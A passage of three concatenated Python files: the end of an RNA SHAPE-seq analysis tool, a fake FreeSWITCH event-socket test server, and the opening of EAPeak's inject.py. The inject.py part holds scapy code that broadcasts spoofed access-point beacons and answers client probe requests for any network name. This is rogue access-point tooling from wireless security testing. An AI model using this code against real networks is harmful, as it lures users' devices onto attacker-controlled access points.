    experiment_name = self.r1.split('_')[0]
    target_file = self.config['target']
    # First FASTA header line (minus the '>') names the reference sequence.
    with open(target_file, 'r') as TF:
        target_name = TF.readline().strip()
        if target_name[0] == ">":
            target_name = target_name[1:]
    copyfile(target_file, os.path.join(output_folder, "ref_seqs.fa"))
    copyfile(target_file, os.path.join(output_folder, "ref_masks.fa"))
    # SHAPEware's driver sheet: one replicate row mapping samples to roles.
    input_sheet = os.path.join(output_folder, "input_sheet.csv")
    with open(input_sheet, 'w') as IS:
        IS.write("Experiment name,Replicate,Reference sequence,Ligand,Sample with SHAPE reagent,Sample without SHAPE reagent,Denatured sample\n")
        IS.write("{},1,{},None,{},{},{}\n".format(experiment_name, target_name, treated, untreated, denatured))
    self._add_note("Created SHAPEware folder at {}.".format(output_folder))
    self._add_note(" {} treated pairs included.".format(counters.RRRY))
    self._add_note(" {} untreated pairs included.".format(counters.YYYR))
    self._add_note(" {} pairs without matching handle were not included.".format(counters.no_mask))
def compare(self):
    """Run both the 'find_partial' and 'lookup' algorithms over the input
    pairs and verify they agree pair-by-pair; on the first mismatch,
    print a ready-to-use JSON test case and stop.
    """
    from spats_shape_seq import Spats
    from spats_shape_seq.pair import Pair
    # Skeleton of the JSON test case emitted when a mismatch is found.
    json_base = { 'target' : self.config['target'], 'config' : { 'algorithm' : 'find_partial', 'debug' : True }, 'expect' : {}}
    spats_fp = Spats(cotrans = self.cotrans)
    spats_lookup = Spats(cotrans = self.cotrans)
    self._update_run_config(spats_fp.run)
    # Second call also records the applied config into the skeleton.
    self._update_run_config(spats_lookup.run, json_base['config'])
    spats_fp.run.algorithm = 'find_partial'
    spats_lookup.run.algorithm = 'lookup'
    spats_fp.addTargets(self.config['target'])
    spats_lookup.addTargets(self.config['target'])
    count = 0   # pairs processed (excluding empty/skipped pairs)
    match = 0   # pairs where both algorithms found the same site
    with FastFastqParser(self.r1, self.r2) as parser:
        total = parser.appx_number_of_pairs()
        for batch in parser.iterator(5000):
            for item in batch:
                pair_fp = Pair()
                pair_lookup = Pair()
                if (not pair_fp.set_from_data(str(item[0]), item[1], item[2]) or
                    not pair_lookup.set_from_data(str(item[0]), item[1], item[2])):
                    print('\nskipping empty pair: {}'.format(str(item[0])))
                    continue
                try:
                    spats_fp.process_pair(pair_fp)
                    spats_lookup.process_pair(pair_lookup)
                except:
                    print('Error after {}/{}'.format(match, count))
                    raise
                # Agreement: both found no site, or both found the same
                # target/end/site/mutations.
                if (pair_fp.has_site == pair_lookup.has_site):
                    if not pair_fp.has_site:
                        count += 1
                        continue
                    elif (pair_fp.target.name == pair_lookup.target.name and
                          pair_fp.end == pair_lookup.end and
                          pair_fp.site == pair_lookup.site and
                          pair_fp.mutations == pair_lookup.mutations):
                        count += 1
                        match += 1
                        continue
                # Mismatch: emit a reproducible test case and bail out.
                json_base["id"] = str(item[0])
                json_base["R1"] = str(item[1])
                json_base["R2"] = str(item[2])
                print('After {}/{} matches; mismatched pair: {} != {}\n{}'.format(match, count, pair_fp, pair_lookup,
                                                                                 json.dumps(json_base, sort_keys = True,indent = 4, separators = (',', ': '))))
                return
            # Per-batch progress report.
            print('{}/{}-{}...'.format(match, count, total))
    spats_fp.counters.total_pairs = count
    spats_lookup.counters.total_pairs = count
    print('All match {}/{}.'.format(match, count))
    print(spats_fp._report_counts())
    print(spats_lookup._report_counts())
def _test_case_registry(self):
    """Return the shared unit-test case registry."""
    from spats_shape_seq.tests import test_harness
    return test_harness.registry()
def extract_case(self):
    """Extracts a test case from the registry.
    """
    self._skip_log = True
    args = self._command_args
    if not args or len(args) < 2:
        raise Exception("extract requires a test case id and an output filename")
    case_id, test_case_file = args[0], args[1]
    reg = self._test_case_registry()
    case = reg.extract_case(case_id)
    if not case:
        raise Exception('Unknown case id: {}'.format(case_id))
    serialized = json.dumps(case.jsonDict(), sort_keys = True, indent = 4, separators = (',', ': '))
    open(test_case_file, 'w').write(serialized)
    print("Extracted case '{}' to '{}'".format(case_id, test_case_file))
def add_case(self):
    """Adds a test case from the registry.
    """
    self._skip_log = True
    if not self._command_args:
        raise Exception("add requires a test case file")
    test_case_file = self._command_args[0]
    with open(test_case_file, 'r') as case_file:
        test_case = json.loads(case_file.read())
    self._test_case_registry().add_case(test_case)
    print("Added case '{}' to set '{}' in the test case registry.".format(test_case['id'], test_case['set_name']))
def show_test_case(self):
    """Shows the diagram and result for analysis of a unit test case.
    """
    self._skip_log = True
    if not self._command_args:
        raise Exception("show_test_case requires a test id")
    test_case_id = self._command_args[0]
    print(test_case_id)
    test_case = self._test_case_registry().extract_case(test_case_id)
    # Run with debugging on so the diagram shows full detail.
    test_case.run_opts['debug'] = True
    print(json.dumps(test_case.jsonDict(), sort_keys = True, indent = 4, separators = (',', ': ')))
    self._show_case(test_case)
def show(self):
    """Shows the diagram and result for analysis of a test case pair.
    """
    import spats_shape_seq.tests.test_harness
    self._skip_log = True
    if not self._command_args:
        raise Exception("show requires the path to a test case")
    with open(self._command_args[0], 'r') as case_file:
        test_case_dict = json.loads(case_file.read())
    test_case = spats_shape_seq.tests.test_harness.SpatsCase(test_case_dict)
    self._show_case(test_case)
def _show_case(self, test_case):
    """Process `test_case` with each configured algorithm, print the pair
    diagram, and check any 'expect' assertions; exits with status 1 on
    the first failed expectation.
    """
    from spats_shape_seq import Spats
    from spats_shape_seq.diagram import diagram
    # A single 'algorithm' wins; otherwise run every listed algorithm.
    alg = test_case.run_opts.get('algorithm')
    algs = [ alg ] if alg else test_case.run_opts.get('algorithms', [ 'find_partial', 'lookup' ])
    for algorithm in algs:
        spats = Spats()
        spats.run.algorithm = algorithm
        for key, value in test_case.run_opts.items():
            if str(key) == 'algorithms':
                continue
            # NOTE(review): `unicode` is the Python 2 builtin -- this module
            # appears to target Python 2.
            if isinstance(value, unicode):
                value = str(value)
            if not hasattr(spats.run, key):
                raise Exception('Invalid run_opt: {}'.format(key))
            setattr(spats.run, key, value)
        for name, seq in iter(test_case.targets.items()):
            spats.addTarget(name, seq)
        pair = test_case.pair()
        if len(algs) > 1:
            print('\n[[ ALGORITHM: {} ]]'.format(algorithm))
        spats.process_pair(pair)
        if test_case.comment:
            print('Comment: {}'.format(test_case.comment))
        print(diagram(pair, spats.run))
        if test_case.expect:
            # should mirror `_check_expect` in test_harness.py...
            expects = test_case.expect
            fail = False  # NOTE(review): unused
            try:
                if expects['site'] is None:
                    if pair.site is not None:
                        raise Exception("pair.site={} when expecting none.".format(pair.site))
                else:
                    if pair.site is None:
                        raise Exception("pair.site is none when expecting {}.".format(expects['site']))
                    if pair.site != expects['site']:
                        raise Exception("pair.site={} != expect.site={}".format(pair.site, expects['site']))
                if 'end' in expects and pair.end != expects['end']:
                    raise Exception("pair.end={} != expect.end={}".format(pair.end, expects['end']))
                if 'muts' in expects:
                    if expects['muts'] is not None and len(expects['muts']) > 0:
                        # Mutations are compared order-insensitively.
                        if not sorted(expects['muts']) == (sorted(pair.mutations) if pair.mutations else pair.mutations):
                            raise Exception("mismatching mutations: expected={}, pair.mutations={}".format(expects['muts'], pair.mutations))
                    else:
                        if not (pair.mutations is None or len(pair.mutations) == 0):
                            raise Exception("unexpected mutations: {}".format(pair.mutations))
                if 'r1_indels' in expects:
                    r1inds = objdict_to_dict(pair.r1.indels)
                    if expects['r1_indels']:
                        if expects['r1_indels'] != r1inds:
                            raise Exception("mismatching R1 indels: expected={}, pair.r1.indels={}".format(expects['r1_indels'], r1inds))
                    elif pair.r1.indels:
                        raise Exception("unexpected R1 indels: pair.r1.indels={}".format(pair.r1.indels))
                if 'r2_indels' in expects:
                    r2inds = objdict_to_dict(pair.r2.indels)
                    if expects['r2_indels']:
                        if expects['r2_indels'] != r2inds:
                            raise Exception("mismatching R2 indels: expected={}, pair.r2.indels={}".format(expects['r2_indels'], r2inds))
                    elif pair.r2.indels:
                        raise Exception("unexpected R2 indels: pair.r2.indels={}".format(r2inds))
                if 'counters' in expects:
                    for counter, value in iter(expects['counters'].items()):
                        if getattr(spats.counters, str(counter)) != value:
                            raise Exception("counter '{}' value off: expected={} != got={}".format(counter, value, getattr(spats.counters, counter)))
                if 'pair.target' in expects:
                    tname = pair.target.name if pair.target else None
                    if tname != expects['pair.target']:
                        raise Exception("pair.target={} != expect.pair.target={}".format(tname, expects['pair.target']))
            except Exception as e:
                print('FAIL: {}'.format(e))
                sys.exit(1)
            print('PASS')
def doc(self):
    """Show the spats documentation.
    """
    self._skip_log = True
    if spats_shape_seq._PUBLIC_RELEASE:
        # Released builds open the hosted documentation.
        import webbrowser
        webbrowser.open('http://spats.readthedocs.io/')
        return
    # Development builds render and open the local docs.
    subprocess.check_call(["make", "showdocs"], cwd = self._spats_path())
def help(self):
    """Display available commands.
    """
    self._skip_log = True
    print("\nspats_tool v{}\nCommands:\n".format(spats_shape_seq._VERSION))
    # Public commands are the non-underscore attributes of SpatsTool that
    # carry a docstring; development-only commands are hidden in public releases.
    for key in sorted(SpatsTool.__dict__.keys()):
        if key.startswith('_'):
            continue
        if key in self._private_commands and spats_shape_seq._PUBLIC_RELEASE:
            continue
        value = getattr(SpatsTool, key)
        if value.__doc__:
            print(" {}: {}".format(key, value.__doc__.rstrip()))
    print("\nData commands require 'spats.config' to be present in the current working directory,")
    print("which requires a [spats] section header and should at least specify the 'target', 'r1',")
    print("and 'r2' configuration keys.\n")
# Default contents written to a new 'spats.config'; keys are left
# commented out as inline documentation for the user to fill in.
_spats_config_template = """
[spats]
# set to True/False depending on whether this is a cotrans experiment
cotrans = True
# Required for pre-sequencing tool: the path to the ABIF (.fsa) file. Can also be a comma-separated list for multiple files.
#preseq =
# Required for SPATS runs and reads analysis: the path to the targets FASTA file.
#target =
# Required for SPATS runs and reads analysis: the paths to the R1/R2 data files.
#r1 =
#r2 =
# Known metadata. Recommended to provide all applicable fields.
[metadata]
# Experiment name
#name =
# Author / Experimenter (initials)
#author =
# Date: this will be filled in automatically (today's date/time) unless explicitly provided.
#date =
# Folding conditions:
#buffer =
#temperature =
#salt =
#probe =
# Lot numbers:
#adapter =
#enzyme =
#reagent =
"""
def run(args, path = None):
    """Run the spats tool with command-line `args` in directory `path`
    (None means the current working directory)."""
    tool = SpatsTool(path)
    tool._run(args)
if __name__ == '__main__':
    # Invoked as a script: pass along everything after the program name.
    run(sys.argv[1:])
|
fakeeslserver.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import threading
import time
class FakeESLServer(object):
    """In-process fake of a FreeSWITCH event-socket (ESL) server for tests.

    Listens on (address, port), authenticates a single client against
    `password`, and answers requests from the canned `commands` table.
    NOTE(review): socket I/O uses plain str (Python 2 style); under
    Python 3 the send/recv calls would need bytes -- confirm the target
    interpreter.
    """
    def __init__(self, address, port, password):
        self._address = address
        self._port = port
        self._password = password
        self._client_socket = None  # set when a client connects
        self._running = False
        self.commands = {}  # request line -> canned reply payload
        self.setup_commands()
    def setup_commands(self):
        # Canned output for the one API command the tests exercise.
        self.commands['api khomp show links concise'] = ('B00L00:kes{SignalLost},sync\n' +
            'B01L00:kesOk,sync\n' +
            'B01L01:[ksigInactive]\n')
    def start_server(self):
        """Bind, listen, and start the daemon reader thread for one client."""
        self.server = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
        self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.server.bind((self._address, self._port))
        self.server.listen(10)
        self._running = True
        self._read_thread = threading.Thread(target=self.protocol_read)
        self._read_thread.setDaemon(True)
        self._read_thread.start()
    def command_reply(self, data):
        # ESL 'command/reply' envelope; blank line terminates the message.
        self._client_socket.send('Content-Type: command/reply\n')
        self._client_socket.send('Reply-Text: %s\n\n' % data)
    def protocol_send(self, lines):
        # Send header lines followed by the blank line that ends a message.
        for line in lines:
            self._client_socket.send(line + '\n')
        self._client_socket.send('\n')
    def api_response(self, data):
        # ESL 'api/response' envelope with explicit content length.
        data_length = len(data)
        self._client_socket.send('Content-Type: api/response\n')
        self._client_socket.send('Content-Length: %d\n\n' % data_length)
        self._client_socket.send(data)
    def handle_request(self, request):
        """Dispatch one client request line (auth / exit / canned command)."""
        if request.startswith('auth'):
            received_password = request.split()[-1].strip()
            if received_password == self._password:
                self.command_reply('+OK accepted')
            else:
                # Wrong password: refuse and drop the connection.
                self.command_reply('-ERR invalid')
                self.disconnect()
        elif request == 'exit':
            self.command_reply('+OK bye')
            self.disconnect()
            self.stop()
        elif request in self.commands:
            data = self.commands.get(request)
            if request.startswith('api'):
                self.api_response(data)
            else:
                self.command_reply(data)
        else:
            if request.startswith('api'):
                self.api_response('-ERR %s Command not found\n' % request.replace('api', '').split()[0])
            else:
                self.command_reply('-ERR command not found')
    def protocol_read(self):
        """Reader loop: accept one client, then handle blank-line-terminated requests."""
        self._client_socket, address = self.server.accept()
        self.protocol_send(['Content-Type: auth/request'])
        while self._running:
            buf = ''
            # Read byte-by-byte until a blank line terminates the request.
            while self._running:
                try:
                    read = self._client_socket.recv(1)
                except Exception:
                    # Client went away (or socket closed): stop serving.
                    self._running = False
                    self.server.close()
                    break
                buf += read
                if buf[-2:] == '\n\n' or buf[-4:] == '\r\n\r\n':
                    request = buf  # NOTE(review): dead store -- overwritten by the strip() below
                    break
            request = buf.strip()
            if not request and not self._running:
                break
            self.handle_request(request)
    def fake_event_plain(self, data):
        """Push a fabricated 'text/event-plain' event to the client."""
        self.protocol_send(['Content-Type: text/event-plain',
                            'Content-Length: %s' % len(data)])
        self._client_socket.send(data)
    def disconnect(self):
        """Send the ESL disconnect notice and close the client socket."""
        self.protocol_send(['Content-Type: text/disconnect-notice',
                            'Content-Length: 67'])
        self._client_socket.send('Disconnected, goodbye.\n')
        self._client_socket.send('See you at ClueCon! http://www.cluecon.com/\n')
        self._running = False
        self._client_socket.close()
    def stop(self):
        """Close sockets and join the reader thread."""
        self._client_socket.close()
        self.server.close()
        if self._running:
            self._running = False
            self._read_thread.join(5)
def main():
    # Run the fake server standalone on the standard FreeSWITCH ESL port.
    server = FakeESLServer('0.0.0.0', 8021, 'ClueCon')
    server.start_server()
    # Block until a client 'exit' (or a socket error) stops the server.
    while server._running:
        time.sleep(1)
    server.stop()
if __name__ == '__main__':
    # Allow running the fake server directly for manual testing.
    main()
|
inject.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# lib/eapeak/inject.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import Queue
from random import randint
from struct import pack, unpack
import threading
import time
# external imports
from scapy.layers.dot11 import RadioTap, Dot11, Dot11Beacon, Dot11Elt, Dot11Auth, Dot11AssoReq, Dot11AssoResp, Dot11ProbeReq, Dot11Disas, Dot11QoS, Dot11ProbeResp
from scapy.layers.l2 import LLC, SNAP, EAPOL
from scapy.sendrecv import sniff, sendp
# project imports
from eapeak.common import get_bssid, get_source, get_destination, __version__
from eapeak.parse import parse_rsn_data, build_rsn_data
from eapeak.scapylayers.l2 import LEAP, PEAP, EAP # pylint: disable=unused-import
from ipfunc import getHwAddr
RESPONSE_TIMEOUT = 1.5 # Time to wait for a response (seconds)
# Privacy modes advertised in beacons / probe responses.
PRIVACY_NONE = 0
PRIVACY_WEP = 1
PRIVACY_WPA = 2
EAP_MAX_TRIES = 3  # attempts per EAP exchange before giving up
# ANSI-colored prefixes for console status messages.
GOOD = '\033[1;32m[+]\033[1;m '
STATUS = '\033[1;34m[*]\033[1;m '
ERROR = '\033[1;31m[-]\033[1;m '
class SSIDBroadcaster(threading.Thread):
    """
    This object is a thread-friendly SSID broadcaster.
    It's meant to be controlled by the Wireless State Machine.
    """
    def __init__(self, interface, essid, bssid=None):
        """
        interface -- monitor-mode interface to inject frames on
        essid -- network name to advertise in the beacons
        bssid -- AP MAC address; defaults to the interface's own MAC
        """
        threading.Thread.__init__(self)
        self.interface = interface
        self.essid = essid
        if not bssid:
            bssid = getHwAddr(interface)
        self.bssid = bssid.lower()
        self.broadcast_interval = 0.15  # seconds between beacons
        self.channel = "\x06"  # DS Parameter Set payload (channel 6)
        self.set_privacy(PRIVACY_NONE)  # builds self.beacon
        self.sequence = randint(1200, 2000)  # initial 802.11 sequence number
        self.__shutdown__ = False  # set True to make run() exit
    def __fixSC__(self, fragment=0):
        """
        This is a reserved method to return the sequence number in a way
        that is not skewed by a bug in how the SC field is packed in
        Scapy.
        """
        # Advance the counter first, wrapping at the 12-bit sequence limit.
        if self.sequence >= 0xFFF:
            self.sequence = 1
        else:
            self.sequence += 1
        # Pack sequence+fragment into the SC layout, then swap byte order.
        SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4)
        return unpack('<H', pack('>H', SC))[0]
    def run(self):
        """
        This is the thread routine that broadcasts the SSID.
        """
        while not self.__shutdown__:
            self.beacon.getlayer(Dot11).SC = self.__fixSC__()
            sendp(self.beacon, iface=self.interface, verbose=False)
            time.sleep(self.broadcast_interval)
    def set_privacy(self, value):
        """
        Configure the privacy settings for None, WEP, and WPA.
        Rebuilds self.beacon; takes effect on the next broadcast.
        """
        if value == PRIVACY_NONE:
            # Open network: no privacy bit in the capabilities.
            self.beacon = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
                Dot11Beacon(cap='ESS+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info=self.essid)/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=self.channel)/
                Dot11Elt(ID=42, info="\x04")/
                Dot11Elt(ID=47, info="\x04")/
                Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )
        elif value == PRIVACY_WEP:
            # WEP: privacy bit set, no WPA/RSN information elements.
            self.beacon = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
                Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info=self.essid)/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=self.channel)/
                Dot11Elt(ID=42, info="\x04")/
                Dot11Elt(ID=47, info="\x04")/
                Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )
        elif value == PRIVACY_WPA:
            # WPA: privacy bit plus vendor-specific (ID 221) WPA/WMM elements.
            self.beacon = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
                Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info=self.essid)/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=self.channel)/
                Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/
                Dot11Elt(ID=42, info="\x00")/
                Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/
                Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
            )
    def send_beacon(self):
        """
        Convenience function for sending beacons without starting a thread
        """
        self.beacon.getlayer(Dot11).SC = self.__fixSC__()
        sendp(self.beacon, iface=self.interface, verbose=False)
    @staticmethod
    def send_beacon_ex(essid, interface, privacy=PRIVACY_NONE, bssid=None, channel=6):
        """
        Convenience function for sending beacons without a thread or creating an instance
        """
        if not bssid:
            bssid = getHwAddr(interface)
        channel = chr(channel)
        sequence = randint(1200, 2000)
        if privacy in [PRIVACY_NONE, 'none', 'NONE']:
            beacon = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
                Dot11Beacon(cap='ESS+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info=essid)/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=channel)/
                Dot11Elt(ID=42, info="\x04")/
                Dot11Elt(ID=47, info="\x04")/
                Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )
        elif privacy in [PRIVACY_WEP, 'wep', 'WEP']:
            beacon = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
                Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info=essid)/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=channel)/
                Dot11Elt(ID=42, info="\x04")/
                Dot11Elt(ID=47, info="\x04")/
                Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )
        elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']:
            beacon = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
                Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info=essid)/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=channel)/
                Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/
                Dot11Elt(ID=42, info="\x00")/
                Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/
                Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
            )
        else:
            raise Exception('Invalid privacy setting')
        sendp(beacon, iface=interface, verbose=False)
class ClientListener(threading.Thread):
    """
    This object is a thread-friendly listener for Client connection
    attempts.
    The backlog corresponds to the size of the queue, if the queue is
    full because the items are not being handled fast enough then new
    association requests will be dropped and lost.
    """
    def __init__(self, interface, backlog, essid=None, bssid=None):
        """
        interface -- monitor-mode interface to sniff and inject on
        backlog -- maximum number of queued client MAC addresses
        essid -- network name to answer probes for (None answers any probe)
        bssid -- AP MAC address; defaults to the interface's own MAC
        """
        threading.Thread.__init__(self)
        self.interface = interface
        self.backlog = backlog
        self.essid = essid
        if not bssid:
            bssid = getHwAddr(interface)
        self.bssid = bssid.lower()
        self.lastpacket = None
        self.client_queue = Queue.Queue(self.backlog)
        self.channel = "\x06"
        self.sequence = randint(1200, 2000)
        # BUGFIX: build a default probe-response template so run() never hits
        # an AttributeError when set_privacy() was not called first (matches
        # SSIDBroadcaster.__init__). Callers may still override it later.
        self.set_privacy(PRIVACY_NONE)
        self.__shutdown__ = False
    def __fixSC__(self, fragment=0):
        """
        This is a reserved method to return the sequence number in a way
        that is not skewed by a bug in how the SC field is packed in
        Scapy.
        """
        if self.sequence >= 0xFFF:
            self.sequence = 1
        else:
            self.sequence += 1
        SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4) # bit shifts FTW!
        return unpack('<H', pack('>H', SC))[0]
    def __stopfilter__(self, packet):
        """
        This is the stop filter for Scapy to be used to check if the
        packet was sent to EAPeak.
        """
        if packet.haslayer(Dot11Auth) or packet.haslayer(Dot11AssoReq):
            if get_bssid(packet) == self.bssid and get_source(packet) != self.bssid:
                self.lastpacket = packet
                return True
            return False
        elif packet.haslayer(Dot11ProbeReq):
            self.lastpacket = packet
            return True
        return False
    def set_privacy(self, value):
        """
        Configure the privacy settings for None, WEP, and WPA.
        Rebuilds self.probe_response_template.
        """
        if value == PRIVACY_NONE:
            # BUGFIX: the open-network template previously advertised the
            # 'privacy' capability while the WEP one did not -- the two cap
            # strings were swapped relative to SSIDBroadcaster.set_privacy.
            self.probe_response_template = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
                Dot11ProbeResp(cap='ESS+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info='')/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=self.channel)/
                Dot11Elt(ID=42, info="\x04")/
                Dot11Elt(ID=47, info="\x04")/
                Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )
        elif value == PRIVACY_WEP:
            self.probe_response_template = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
                Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info='')/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=self.channel)/
                Dot11Elt(ID=42, info="\x04")/
                Dot11Elt(ID=47, info="\x04")/
                Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )
        elif value == PRIVACY_WPA:
            self.probe_response_template = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
                Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info='')/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=self.channel)/
                Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/
                Dot11Elt(ID=42, info="\x00")/
                Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/
                Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
            )
    def run(self):
        """
        This is the thread routine that handles probe requests and sends
        probe responses when appropriate.
        """
        while not self.__shutdown__:
            sniff(iface=self.interface, store=0, timeout=RESPONSE_TIMEOUT, stop_filter=self.__stopfilter__)
            if self.lastpacket:
                if self.lastpacket.haslayer(Dot11ProbeReq):
                    # Walk the information elements looking for the SSID (ID 0).
                    ssid = None
                    tmp = self.lastpacket.getlayer(Dot11ProbeReq)
                    while tmp:
                        tmp = tmp.payload
                        if tmp.fields['ID'] == 0:
                            ssid = tmp.info
                            break
                    if ssid is None:
                        continue
                    elif ssid == '' and self.essid:
                        # Broadcast probe: answer with our configured ESSID.
                        ssid = self.essid
                    if self.essid is None or self.essid == ssid:
                        self.probe_response_template.getlayer(Dot11).addr1 = get_source(self.lastpacket)
                        self.probe_response_template.getlayer(Dot11Elt).info = ssid
                        sendp(self.probe_response_template, iface=self.interface, verbose=False)
                    self.lastpacket = None
                    continue
                # Auth/association attempt: hand the client MAC to the consumer,
                # silently dropping it when the backlog queue is full.
                clientMAC = get_source(self.lastpacket)
                if not self.client_queue.full():
                    self.client_queue.put(clientMAC, False)
                self.lastpacket = None
                continue
class WirelessStateMachine:
    """
    This provides a pseudo-socket like object that provides a stack for
    Dot11 communications using Scapy.
    Remember:
        States Are For Smashing
    """
    def __init__(self, interface, bssid, source_mac=None, dest_mac=None):
        """
        You must specify a BSSID and a Local MAC address because the
        entire point of this code is to facilitate stateful connections.
        interface -- monitor-mode interface to use
        bssid -- BSSID of the target network
        source_mac -- local MAC; defaults to the interface's own MAC
        dest_mac -- peer MAC; defaults to the BSSID
        """
        if not source_mac:
            source_mac = getHwAddr(interface)
        if not dest_mac:
            dest_mac = bssid
        self.interface = interface
        self.bssid = bssid.lower()
        self.source_mac = source_mac.lower()
        self.dest_mac = dest_mac.lower()
        self.connected = False # connected / associated
        self.__shutdown__ = False
        self.sequence = randint(1200, 2000)
        self.lastpacket = None  # last frame captured by __stopfilter__
        self.timeout = RESPONSE_TIMEOUT
    def __del__(self):
        self.shutdown()
        self.close()
    def __fixSC__(self, fragment=0):
        """
        This is a reserved method to return the sequence number in a way
        that is not skewed by a bug in how the SC field is packed in
        Scapy.
        """
        # NOTE(review): unlike SSIDBroadcaster/ClientListener, this variant
        # does not advance self.sequence itself -- callers increment it
